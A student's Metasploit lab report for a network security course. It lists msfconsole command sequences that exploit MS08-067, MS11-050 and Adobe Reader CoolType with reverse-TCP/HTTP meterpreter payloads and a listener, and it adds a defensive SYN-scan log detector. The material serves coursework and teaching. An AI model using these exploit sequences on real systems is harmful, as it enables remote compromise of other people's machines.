2017-2018-2 20155204 "Network Countermeasure Technology" EXP5 MSF Basic Application

1. Answers to basic questions

Explain in your own words what exploit, payload and encode are

  • Exploit: the step that actually carries out the attack by using a vulnerability in the target system; everything before it is preparatory work.
  • Payload: the code that the exploit delivers, for example virus code packaged into a program, which is sent through the vulnerability we have prepared.
  • Encode: encrypting and disguising the payload so that it is concealed.

2. The practical process

1. Windows Service Penetration Attack - MS08-067 Security Vulnerability

Enter msfconsole on the attack machine kali to open the console, then enter the following commands in sequence:

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show payloads

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp // tcp reverse connection

msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 // attack machine ip

msf exploit(ms08_067_netapi) > set LPORT 5213 // attack port

msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 // target machine ip; the port for this vulnerability is already fixed

msf exploit(ms08_067_netapi) > set target 0 // automatically selects the target system type, with a high match rate

msf exploit(ms08_067_netapi) > exploit // attack

2. Browser Penetration Attack - MS11-050

Enter msfconsole on the attack machine kali to open the console, then enter the following commands in sequence:

msf > use windows/browser/ms11_050_mshtml_cobjectelement

msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http // http reverse connection

msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 // attack machine ip

msf exploit(ms11_050_cobjectelement) > set LPORT 5213 // attack port, fixed

msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm // set the URI (uniform resource identifier) path

msf exploit(ms11_050_cobjectelement) > exploit

3. Penetration attack against Adobe Reader software - adobe_toolbutton

Enter msfconsole on the attack machine kali to open the console, then enter the following commands in sequence:

msf > use windows/fileformat/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp // tcp reverse connection

msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 // attack machine ip

msf exploit(adobe_cooltype_sing) > set LPORT 5213 // attack port

msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf // name of the generated pdf file

msf exploit(adobe_cooltype_sing) > exploit // attack

Enter back on kali to leave the current module, then enter the listener module with the following commands:

msf > use exploit/multi/handler // enter the listener module

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp // tcp reverse connection

msf exploit(handler) > set LHOST 192.168.43.161 // attack machine ip

msf exploit(handler) > set LPORT 5213 // attack port, fixed

msf exploit(handler) > exploit

4. Apply any auxiliary module.

  • Using the scanner/http/prev_dir_same_name_file module
    This module looks for a file in the first parent directory that has the same name as the given directory path. Example: if PATH is Test/backup/files/, it will search for the file /backup/files.ext under the Test path, where .ext is the configured file type.

  • Using the auxiliary/scanner/portscan/syn module

This module detects open ports by sending TCP packets with the SYN flag set. Below is my scan of my target machine.
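As an added example (not part of the original report), the defender's view of the same SYN scan: a small detector that reads netfilter/iptables-style firewall log lines and flags any source that sends SYNs to many distinct destination ports inside a short window, which is exactly the pattern the portscan/syn module produces. The log lines, host names and addresses below are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in netfilter/iptables log format (not real traffic).
# 192.168.43.161 plays the scanning host; 192.168.43.20 is a normal web client.
SAMPLE_LOG = """\
Apr 20 10:00:01 fw kernel: IN=eth0 OUT= SRC=192.168.43.161 DST=192.168.43.50 PROTO=TCP SPT=40001 DPT=21 SYN
Apr 20 10:00:01 fw kernel: IN=eth0 OUT= SRC=192.168.43.161 DST=192.168.43.50 PROTO=TCP SPT=40002 DPT=22 SYN
Apr 20 10:00:02 fw kernel: IN=eth0 OUT= SRC=192.168.43.161 DST=192.168.43.50 PROTO=TCP SPT=40003 DPT=80 SYN
Apr 20 10:00:02 fw kernel: IN=eth0 OUT= SRC=192.168.43.161 DST=192.168.43.50 PROTO=TCP SPT=40004 DPT=135 SYN
Apr 20 10:00:03 fw kernel: IN=eth0 OUT= SRC=192.168.43.161 DST=192.168.43.50 PROTO=TCP SPT=40005 DPT=139 SYN
Apr 20 10:00:03 fw kernel: IN=eth0 OUT= SRC=192.168.43.161 DST=192.168.43.50 PROTO=TCP SPT=40006 DPT=445 SYN
Apr 20 10:00:05 fw kernel: IN=eth0 OUT= SRC=192.168.43.20 DST=192.168.43.50 PROTO=TCP SPT=51000 DPT=80 SYN
Apr 20 10:00:09 fw kernel: IN=eth0 OUT= SRC=192.168.43.20 DST=192.168.43.50 PROTO=TCP SPT=51001 DPT=80 SYN
"""

# Matches only TCP lines that carry the SYN flag; other flags/protocols are ignored.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) .*?SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
    r"PROTO=TCP .*?DPT=(?P<dport>\d+) .*?\bSYN\b"
)

def parse_syn_events(log_text):
    """Return (timestamp, src, dst, dport) tuples for every TCP SYN line."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year defaults to 1900; fine for deltas
            events.append((ts, m["src"], m["dst"], int(m["dport"])))
    return events

def detect_syn_scans(log_text, threshold=5, window_seconds=10):
    """Flag sources that SYN to at least `threshold` distinct (dst, port) pairs
    within any sliding window of `window_seconds`. Returns {src: max_targets}."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in parse_syn_events(log_text):
        by_src[src].append((ts, (dst, dport)))
    flagged, window = {}, timedelta(seconds=window_seconds)
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            targets = {t for ts, t in events[i:] if ts - start <= window}
            if len(targets) >= threshold:
                flagged[src] = max(flagged.get(src, 0), len(targets))
    return flagged

if __name__ == "__main__":
    print(detect_syn_scans(SAMPLE_LOG))  # the scanning host with its target count
```

The repeated SYNs from 192.168.43.20 to one port are normal client retries and stay below the threshold, so only the host that probes many ports is reported.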

3. What technologies or steps are still missing compared with real-world operations?

How to transfer the backdoor file securely, and how to learn the target machine's vulnerabilities in the first place: this is where I think the gap from real-world operations lies.

4. Experiment summary

This experiment made me feel one step closer to real operations, and it applied many common vulnerabilities. However, we are still limited to a few of msf's modules, and it is difficult to get the generated file's icon onto the target machine, so we look forward to new breakthroughs in the next experiment.
